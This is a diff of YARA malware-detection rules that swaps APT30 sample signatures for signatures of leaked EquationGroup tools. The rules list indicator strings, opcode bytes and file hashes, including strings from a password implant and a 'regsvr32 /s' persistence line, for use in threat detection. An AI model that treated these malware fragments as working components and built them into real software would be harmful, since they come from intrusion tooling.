-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L871-L885"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3011-L3025"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "57169cb4b8ef7a0d7ebd7aa039d1a1efd6eb639e"
-		logic_hash = "1fe5be3a88859fd3d485adfba92cf117afedc739bd0a46c039124919c3b81361"
+		logic_hash = "0cd3ba351b1c5716ed322c9f177a848322324526f3d39c2be5cc34bc6aee9fa6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788"
 
 	strings:
-		$s1 = "Copyright (c) 2007 Microfost All Rights Reserved" fullword wide
-		$s2 = "Microfost" fullword wide
+		$s2 = "0M1U1Z1p1" fullword ascii
+		$s14 = "SPRQWV" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_K : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Rc5 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "49629825-4233-5d74-b763-b2500536eb90"
-		date = "2015-04-03"
-		modified = "2023-01-06"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L887-L917"
+		id = "854c1726-4ba4-5464-a765-4dd154a1b166"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3027-L3043"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "142bc01ad412799a7f9ffed994069fecbd5a2f93"
-		logic_hash = "eed03bb4290eef0ad1cf362a157923aa1fb8faa9305b5aaba3563d0a4e65e1a5"
+		logic_hash = "6d9ba73fe2a6da99ba44b00bcb5ecf51e983ac245fd5c6e620d35e8120514464"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb"
 
 	strings:
-		$x1 = "Maybe a Encrypted Flash" fullword ascii
-		$s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
-		$s1 = "\\TEMP\\" ascii
-		$s2 = "\\Temporary Internet Files\\" ascii
-		$s5 = "%s Size:%u Bytes" fullword ascii
-		$s7 = "$.DATA$" fullword ascii
-		$s10 = "? Size:%u By s" fullword ascii
-		$s12 = "Maybe a Encrypted Flash" fullword ascii
-		$s14 = "Name:%-32s" fullword ascii
-		$s15 = "NickName:%-32s" fullword ascii
-		$s19 = "Email:%-32s" fullword ascii
-		$s21 = "C:\\Prog" ascii
-		$s22 = "$LDDATA$" ascii
-		$s31 = "Copy File %s OK!" fullword ascii
-		$s32 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
-		$s34 = "open=%s" fullword ascii
+		$s1 = "Usage: %s [d|e] session_key ciphertext" fullword ascii
+		$s2 = "where session_key and ciphertext are strings of hex" fullword ascii
+		$s3 = "d = decrypt mode, e = encrypt mode" fullword ascii
+		$s4 = "Bad mode, should be 'd' or 'e'" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and ( all of ( $x* ) and 3 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_33 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level_Generic : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be6afc4a-97fe-56ba-b057-e21415f9833d"
-		date = "2015-04-13"
+		id = "7ff3d0b0-7a70-561e-9c45-d1f9dbccefe9"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L919-L939"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3045-L3075"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "72c568ee2dd75406858c0294ccfcf86ad0e390e4"
-		logic_hash = "295c2d9fcf1c3bab54650fd1d203dfb8c12269945aad8927066ef6f815abea69"
+		logic_hash = "ddb3441b62b477ab7e3406a22e2a246b60c1d1d25e4acf52ee452a2dfac2daf7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a"
+		hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0"
+		hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7"
+		hash4 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
+		hash5 = "591abd3d7ee214df25ac25682b673f02219da108d1384261052b5167a36a7645"
+		hash6 = "6b71db2d2721ac210977a4c6c8cf7f75a8f5b80b9dbcece1bede1aec179ed213"
+		hash7 = "7be4c05cecb920f1010fc13086635591ad0d5b3a3a1f2f4b4a9be466a1bd2b76"
+		hash8 = "f9cbccdbdf9ffd2ebf1ee84d0ddddd24a61dbe0858ab7f0131bef6c7b9a19131"
+		hash9 = "3cf7a01bdf8e73769c80b75ca269b506c33464d81f574ded8bb20caec2d4cd13"
+		hash10 = "a87a871fe32c49862ed68fda99d92efd762a33ababcd9b6b2b909f2e01f59c16"
 
 	strings:
-		$s0 = "Version 4.7.3001" fullword wide
-		$s1 = "msmsgr.exe" fullword wide
-		$s2 = "MYUSER32.dll" fullword ascii
-		$s3 = "MYADVAPI32.dll" fullword ascii
-		$s4 = "CeleWare.NET1" fullword ascii
-		$s6 = "MYMSVCRT.dll" fullword ascii
-		$s7 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the" wide
-		$s8 = "WWW.CeleWare.NET1" ascii
+		$s1 = "wshtcpip.WSHGetSocketInformation" fullword ascii
+		$s2 = "\\\\.\\%hs" fullword ascii
+		$s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" fullword ascii
+		$s4 = "Corporation. All rights reserved." fullword wide
+		$s5 = { 49 83 3c 24 00 75 02 eb 5d 49 8b 34 24 0f b7 46 }
+		$op1 = { 44 24 57 6f c6 44 24 58 6e c6 44 24 59 }
+		$op2 = { c6 44 24 56 64 88 5c 24 57 }
+		$op3 = { 44 24 6d 4c c6 44 24 6e 6f c6 44 24 6f }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and 6 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_APT30_Sample_34 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level3_Http_Exe : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4802e13-4151-5f17-ba91-dcf9ef6b52bb"
-		date = "2015-04-13"
+		id = "9bb4224e-f900-5f5c-8091-088a4b791ada"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L941-L960"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3077-L3094"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "216868edbcdd067bd2a9cce4f132d33ba9c0d818"
-		logic_hash = "2406f9613585669f88c389ea9729a089f6aef13fba46d60b713f51cd3a946b5d"
+		logic_hash = "50d83b157c338830eea6aba2e09e9d513dd5b50e257d1a16c0d51616bfa26a7f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c"
 
 	strings:
-		$s0 = "dizhi.gif" ascii
-		$s1 = "eagles.vip.nse" ascii
-		$s4 = "o%S:S0" ascii
-		$s5 = "la/4.0" ascii
-		$s6 = "s#!<4!2>s02==<'s1" ascii
-		$s7 = "HlobalAl" ascii
-		$s9 = "vcMicrosoftHaveAck7" ascii
+		$s1 = "Copyright (C) Microsoft" fullword wide
+		$op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 }
+		$op2 = { 44 24 4e 41 88 5c 24 4f ff }
+		$op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_35 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Parsecapture : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8a30720b-06da-5a82-8bab-bf06121afd68"
-		date = "2015-04-13"
+		id = "11743260-c5ce-59de-9fcf-0c050eee98ff"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L962-L977"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3096-L3111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "df48a7cd6c4a8f78f5847bad3776abc0458499a6"
-		logic_hash = "a70d9471215ddcfe84a39b33f53c4114b205aa2cc95cd93081afe442ee2b8b42"
+		logic_hash = "8946bc6d1812a998757a4032755f37aa2be6121a958ebfb6fec90fa60da038fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2"
 
 	strings:
-		$s0 = "WhBoyIEXPLORE.EXE.exe" fullword ascii
-		$s5 = "Startup>A" fullword ascii
-		$s18 = "olhelp32Snapshot" fullword ascii
+		$x1 = "* Encrypted log found.  An encryption key must be provided" fullword ascii
+		$x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" fullword ascii
+		$x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Activedirectory_Target : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "1069cabe-7c09-522f-ad3f-05651490b921"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L979-L996"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3113-L3127"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8cea83299af8f5ec6c278247e649c9d91d4cf3bc"
-		logic_hash = "5f20b60b8721d62731708630a3443741c956304c553f651572282336995f6d4f"
+		logic_hash = "0dee634fe81870b21531046be512e9e54b127207c1910ca5ce5dfab63b1d0603"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36"
 
 	strings:
-		$s0 = "#hostid" fullword ascii
-		$s1 = "\\Windows\\C" ascii
-		$s5 = "TimUmove" fullword ascii
-		$s6 = "Moziea/4.0 (c" fullword ascii
-		$s7 = "StartupNA" fullword ascii
+		$s1 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
+		$s2 = "(&(objectClass=user)(objectCategory=person)" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Legacy_Dll : HIGHVOL FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4d21f402-24da-5e38-9225-a1461e61802f"
-		date = "2015-04-13"
+		id = "254ff1f7-52ee-57fa-be02-2904e132e25c"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L998-L1031"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3129-L3144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a2d4e8583286a3f44b49dc902143ee1ea321d26275c6cbcd54876e94b8cd2a3"
+		logic_hash = "923a595737bc83fe05d0ca7301c70e1cb03cecf97dfa99f5967b77b892a9a533"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "aaa5c64200ff0818c56ebe4c88bcc1143216c536"
-		hash1 = "cb4263cab467845dae9fae427e3bbeb31c6a14c2"
-		hash2 = "b69b95db8a55a050d6d6c0cba13d73975b8219ca"
-		hash3 = "5c29e21bbe8873778f9363258f5e570dddcadeb9"
-		hash4 = "d5cb07d178963f2dea2c754d261185ecc94e09d6"
-		hash5 = "626dcdd7357e1f8329e9137d0f9883f57ec5c163"
-		hash6 = "843997b36ed80d3aeea3c822cb5dc446b6bfa7b9"
+		hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d"
 
 	strings:
-		$s0 = "%s\\%s.txt" fullword
-		$s1 = "\\ldsysinfo.txt"
-		$s4 = "(Extended Wansung)" fullword
-		$s6 = "Computer Name:" fullword
-		$s7 = "%s %uKB %04u-%02u-%02u %02u:%02u" fullword
-		$s8 = "ASSAMESE" fullword
-		$s9 = "BELARUSIAN" fullword
-		$s10 = "(PR China)" fullword
-		$s14 = "(French)" fullword
-		$s15 = "AdvancedServer" fullword
-		$s16 = "DataCenterServer" fullword
-		$s18 = "(Finland)" fullword
-		$s19 = "%s %04u-%02u-%02u %02u:%02u" fullword
-		$s20 = "(Chile)" fullword
+		$op1 = { 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 }
+		$op2 = { 49 c6 45 e1 73 c6 45 e2 57 c6 45 e3 }
+		$op3 = { 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 6f c6 45 ea }
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Svctouch : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample - from many files"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "60d7d661-50e8-5a9b-8366-eda8ff8ad9d4"
-		date = "2015-04-13"
+		id = "a1246afa-32ba-5730-91a2-b1116160d662"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1032-L1087"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3146-L3159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "56c9e58298c318b6dff2cce0ab896bb7bdd22429e6015b8fe72b8ad2f1f69d30"
+		logic_hash = "0e876611ffe4740141a0454f68cfc7dd3c46e0fd44deeb9f3e0f66c8fccd3745"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "aba8b9fa213e5e2f1f0404d13fecc20ea8651b57"
-		hash1 = "7f11f5c9475240e5dd2eea7726c9229972cffc1f"
-		hash2 = "94d3f91d1e50ecea729617729013c3d143bf2c3e"
-		hash3 = "7e516ec04f28c76d67b8111ddfe58bbd628362cc"
-		hash4 = "6b27bc0b0460b0a25b45d897ed4f399106c284d9"
-		hash5 = "6df5b4b3da0964153bad22fb1f69483ae8316655"
-		hash6 = "b68bce61dfd8763c3003480ba4066b3cb1ef126e"
-		hash7 = "cc124682246d098740cfa7d20aede850d49b6597"
-		hash8 = "1ef415bca310575944934fc97b0aa720943ba512"
-		hash9 = "0559ab9356dcc869da18b2c96f48b76478c472b3"
-		hash10 = "f15272042a4f9324ad5de884bd50f4072f4bdde3"
-		hash11 = "1d93d5f5463cdf85e3c22c56ed1381957f4efaac"
-		hash12 = "b6f1fb0f8a2fb92a3c60e154f24cfbca1984529f"
-		hash13 = "9967a99a1b627ddb6899919e32a0f544ea498b48"
-		hash14 = "95a3c812ca0ad104f045b26c483495129bcf37ca"
-		hash15 = "bde9a72b2113d18b4fa537cc080d8d8ba1a231e8"
-		hash16 = "ce1f53e06feab1e92f07ed544c288bf39c6fce19"
-		hash17 = "72dae031d885dbf492c0232dd1c792ab4785a2dc"
-		hash18 = "a2ccba46e40d0fb0dd3e1dba160ecbb5440862ec"
-		hash19 = "c8007b59b2d495029cdf5b7b8fc8a5a1f7aa7611"
-		hash20 = "9c6f470e2f326a055065b2501077c89f748db763"
-		hash21 = "af3e232559ef69bdf2ee9cd96434dcec58afbe5a"
-		hash22 = "e72e67ba32946c2702b7662c510cc1242cffe802"
-		hash23 = "8fc0b1618b61dce5f18eba01809301cb7f021b35"
-		hash24 = "6a8159da055dac928ba7c98ea1cdbe6dfb4a3c22"
-		hash25 = "47463412daf0b0a410d3ccbb7ea294db5ff42311"
-		hash26 = "e6efa0ccfddda7d7d689efeb28894c04ebc72be2"
-		hash27 = "43a3fc9a4fee43252e9a570492e4efe33043e710"
-		hash28 = "7406ebef11ca9f97c101b37f417901c70ab514b1"
-		hash29 = "53ed9b22084f89b4b595938e320f20efe65e0409"
+		hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b"
 
 	strings:
-		$s0 = "%s\\%s\\KB985109.log" fullword
-		$s1 = "%s\\%s\\KB989109.log" fullword
-		$s2 = "Opera.exe" fullword wide
-		$s3 = "%s:All online success on %u!" fullword
-		$s4 = "%s:list online success on %u!" fullword
-		$s5 = "%s:All online fail!" fullword
-		$s6 = "Copyright Opera Software 1995-" wide
-		$s7 = "%s:list online fail!" fullword
-		$s8 = "OnlineTmp.txt" fullword
-		$s9 = "Opera Internet Browser" fullword wide
-		$s12 = "Opera Software" fullword wide
-		$s15 = "Check lan have done!!!" fullword
-		$s16 = "List End." fullword
+		$s1 = "Causes: Firewall,Machine down,DCOM disabled\\not supported,etc." fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Pwd_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b246ae2-ec7d-5813-913e-729e4192da59"
-		date = "2015-04-13"
+		id = "69d071f0-7214-5972-805a-3c0c1d2346c2"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1110-L1140"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3161-L3176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d6a45baee2741c5ebb05fc3f17974a041cd37f665df1e67934b0928fc75f37c3"
+		logic_hash = "f565c42781ff4b0b37e7c00673fb2da2877018317cd415bdb47d4e019485c727"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "bb390f99bfde234bbed59f6a0d962ba874b2396c"
-		hash1 = "b47e20ac5889700438dc241f28f4e224070810d2"
-		hash2 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
-		hash3 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
+		hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542"
 
 	strings:
-		$s0 = "del NetEagle_Scout.bat" fullword
-		$s1 = "NetEagle_Scout.bat" fullword
-		$s2 = "\\visit.exe"
-		$s3 = "\\System.exe"
-		$s4 = "\\System.dat"
-		$s5 = "\\ieupdate.exe"
-		$s6 = "GOTO ERROR" fullword
-		$s7 = ":ERROR" fullword
-		$s9 = "IF EXIST " fullword
-		$s10 = "ioiocn" fullword
-		$s11 = "SetFileAttribute" fullword
-		$s12 = "le_0*^il" fullword
-		$s13 = "le_.*^il" fullword
-		$s14 = "le_-*^il" fullword
+		$s1 = "7\"7(7/7>7O7]7o7w7" fullword ascii
+		$op1 = { 40 50 89 44 24 18 FF 15 34 20 00 }
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_5 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Kisucomms_Target_2000 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e00a670e-cd95-515f-8109-219ce5121ba4"
-		date = "2015-04-13"
+		id = "693a82e5-a3f1-5a56-b33d-0daef36bbe5f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1142-L1163"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3178-L3198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a9d93d7dbf8c5e97ce77cf3fef4941a01c5b1c6bcee40c6f4ca7117d8aee289e"
+		logic_hash = "7d350228ad779d0453c1077afb2b533036eb1e43e4f74a433d68c781db963ab1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "cb4833220c508182c0ccd4e0d5a867d6c4e675f8"
-		hash1 = "dfc9a87df2d585c479ab02602133934b055d156f"
-		hash2 = "bf59d5ff7d38ec5ffb91296e002e8742baf24db5"
+		hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135"
 
 	strings:
-		$s0 = "regsvr32 /s \"%ProgramFiles%\\Norton360\\Engine\\5.1.0.29\\ashelper.dll\"" fullword
-		$s1 = "name=\"ftpserver.exe\"/>" fullword
-		$s2 = "LiveUpdate.EXE" fullword wide
-		$s3 = "<description>FTP Explorer</description>" fullword
-		$s4 = "\\ashelper.dll"
-		$s5 = "LiveUpdate" fullword wide
+		$s1 = "363<3S3c3l3q3v3{3" fullword ascii
+		$s2 = "3!3%3)3-3135393@5" fullword ascii
+		$op0 = { eb 03 89 46 54 47 83 ff 1a 0f 8c 40 ff ff ff 8b }
+		$op1 = { 8b 46 04 85 c0 74 0f 50 e8 34 fb ff ff 83 66 04 }
+		$op2 = { c6 45 fc 02 8d 8d 44 ff ff ff e8 d2 2f 00 00 eb }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or all of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_APT30_Generic_6 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Sldecoder : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dfd104bd-daf4-593a-b161-61f43aec048c"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1165-L1186"
+		id = "1760e84b-fc40-5d60-9351-3a3134af9e9f"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3200-L3214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ff7473e43e11e31fe6ad997009834f661a0120317e479184410456c99f72b613"
+		logic_hash = "81a74169dc8f93f314f384bd859df07a4ffaaf430b221b440de922fad3497535"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
